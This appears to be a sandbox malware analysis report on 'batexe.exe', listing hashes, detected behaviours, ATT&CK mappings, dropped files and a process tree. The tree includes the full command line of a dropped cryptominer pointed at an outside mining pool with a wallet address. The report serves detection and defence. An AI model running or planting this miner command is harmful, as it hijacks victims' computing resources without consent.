73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
295s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 18:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1088	b2e.exe
3192	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3192	cpuminer-sse2.exe
3192	cpuminer-sse2.exe
3192	cpuminer-sse2.exe
3192	cpuminer-sse2.exe
3192	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1460-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1460 wrote to memory of 1088	1460	batexe.exe	88
PID 1460 wrote to memory of 1088	1460	batexe.exe	88
PID 1460 wrote to memory of 1088	1460	batexe.exe	88
PID 1088 wrote to memory of 2488	1088	b2e.exe	89
PID 1088 wrote to memory of 2488	1088	b2e.exe	89
PID 1088 wrote to memory of 2488	1088	b2e.exe	89
PID 2488 wrote to memory of 3192	2488	cmd.exe	92
PID 2488 wrote to memory of 3192	2488	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1460
- C:\Users\Admin\AppData\Local\Temp\5BAD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5BAD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5BAD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5F08.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2488
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5BAD.tmp\b2e.exe

Filesize
12.1MB

MD5
b3c45365ae7a2bfe1c81480880517534

SHA1
32da7e4dc34693c2aebe88c7ee984b3fe5ee1e56

SHA256
4945a34c0862bcdc8dcd35525c3125b050067daf9fddb7f9729bd98cdf697b3e

SHA512
027fdcbdf44c5b549531a0dbef35a621aa266a1ba37d544a52ea7428a5535c0f90b824059ec9285b4c300d3b5de8bd0de6847cf2d911de85280f891d71ca5d92

Download Submit
C:\Users\Admin\AppData\Local\Temp\5BAD.tmp\b2e.exe

Filesize
4.9MB

MD5
be87d8c6f2a9c419d36dd6ae9836aff5

SHA1
e9b639a0fc287564647bd688d4600295258f402e

SHA256
977e785cd3b742611b551d94e8a51e875091254bc5afe3b9abda1f28d83329d3

SHA512
be1087aa9581db3f1af10dabec117b717e35e29e9793e007b4f1adaa81d2df2a7349081505b5aaba37fd12c3ca92f13e348a1b9bad7cab365dbc1122c5b9096d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5BAD.tmp\b2e.exe

Filesize
5.5MB

MD5
695f881d37c8fee6ad5c20b54a5d5dc5

SHA1
e407f78585ff4b7fb5e1bfe1fbce5142a2a87ed0

SHA256
6f3405908b735a3430f12473b357239fb0ff6f9b5fd1475f48e628bffbc074b1

SHA512
c10610d33e5b8a804858138ec5640db49817e341051a7cb95d746dd1f472529ab039e5d6aaedc090e49a6092811db8c0f8eb05fed75ee435fa4c549ff7b11654

Download Submit
C:\Users\Admin\AppData\Local\Temp\5F08.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
320KB

MD5
59d36bdd941feb6c770ec68a37e8c21b

SHA1
1191d1e478164cd720974ea1ad2bc248999a8d45

SHA256
d5227dca74d9be12116b359c9d61265b102c0986eb6196e269cc3e3b895c0293

SHA512
b1620dd0763f2f7c263ae69c71eba7cba29d89f1bb551356abb7073e4e7013347345c43f2bad3c4733300c5b98feecf2fd91db2a363c9e5dcdd87f170edbe406

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
448KB

MD5
ca0b33f54480aa9c590d09f72e3feb31

SHA1
d50dc7dd964feb0d7516c3037e7dc7e008420ae5

SHA256
67833a9e63d8b7469a3a3415124a2426893a6174ce2bd88bea520c68319d182d

SHA512
266dcd9c5bfe2b117fda6bf7c4250a908233d8474bd0b09596a0bd0fa2e5bc75446a20b46cb7e516ef75b5661bbe16c714e8dcc5962a0f481cbaecdf6135affd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
413KB

MD5
21717253bb16b12749467fb81cccb768

SHA1
2c17e2609e4a31079f767c87823cfaa17541da73

SHA256
3a3853ea8ebf5b300e62f00054f5d7485757d112cb444f2f5087e68f39ae962a

SHA512
126e17dc2dac5a939074f6cf9c31b0b46c6a165fd6677819253e27c2b515b8a7322c0c776f7e3d122c5c025bb79ef43fb8578c57a136692f7eff0ea717858a03

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
137KB

MD5
3fe977ef78099bc68d2ea4c2f6a92e42

SHA1
0387527b1be12d142b86525bf0e3269e4d551f4b

SHA256
76b3e9b687ffb43e05b266e65e8a2e0a2b75691acf72fdf048be0fe81ebb2eb9

SHA512
4080d5243c5cbae447a3047579cab116bdb236452bffb05b450b57a48eaf86bdc68630bd6806e7589f5960c7caec751cbc06e9496a18c7ba3e9c5cb078778af3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
611KB

MD5
fa139d761362d5497a62af0841d4d6e8

SHA1
51ffb4230bc92fc1e264c85230be0a9c084fecb5

SHA256
36ba38267f63f93e854254d26a3ff229b658c606c54d15f30b1a1fdc91a511c0

SHA512
2a16720493ddf612eef9da47c20e2737ba6e5b095c3437809d49a055a631316179a34e05eaff7f0a1df4e7e9ea6fc19bd99360dc51db2e9363aed3392f251a1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
123KB

MD5
240278c3bbd4a22efcfaee4a131ebc41

SHA1
763654a13c15cc333ec14f1c9a6ed62354b81b75

SHA256
60500d1fa13d7b88041a1c1cbf5056558e525040f9baef6f3797030e521ebd32

SHA512
9fb19dc903a659e0fb36492f3406ea49561e8e228f6d7741a774d0b618d027221db4b1405b9141ccb624e0651ca4ba5c5446b000a4a317b43d4266ae3a56513c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
65KB

MD5
12c078c2a2021a0a31f7381838020a07

SHA1
b13f77a45d5f37711fd2e6ffa225b5b6fb574b3c

SHA256
4b44959c8222c83a7f7bfd65481834d4c77fde0c392a92f47a080a11f054cad2

SHA512
5ddb0dec5d5e0288f336d8301f85e9481118eb8ce5ce624c53edc76e555559c07adc0a211567e874b1c1ea6d065a9de3b17d81439bea78037fb8fce0d7dc7ac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
215KB

MD5
88547066513cdf317416e6230c8607d0

SHA1
668b7bd1691159274421c004f6ca49837bd08d2e

SHA256
613b5b8562a2ed2baa3c71b5b620672a401f08b26c4df6ba4eafd2bbea53bf91

SHA512
de2d4128c284f20eebf4dd851a730b2b37bc4287b1a5db5bd786f897c49281cc84b9b40ab612ca0d2d5447def1f3aa533edaf53472b77da520dbc8a2937da743

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
196KB

MD5
cbaa26ace0f79159567104834f2f8024

SHA1
aabdc3ca14a3a7e9b73eec26b79ea4189d108e1c

SHA256
be6657105986a935323897dd6ec46fbcd909f7902244b772c73aacf167984bcf

SHA512
5cf95f23c2dd7801820555f8d90fabeeb6f937660cf17f3f93ea22d0bef9e40e1231318acf9b367109f56bf86271badc7eb5c24ee397d7abb6815dde1a248539

Download Submit
memory/1088-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1088-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1460-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3192-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3192-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3192-47-0x0000000001100000-0x00000000029B5000-memory.dmp

Filesize
24.7MB

Download
memory/3192-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-46-0x000000006DDE0000-0x000000006DE78000-memory.dmp

Filesize
608KB

Download
memory/3192-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3192-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download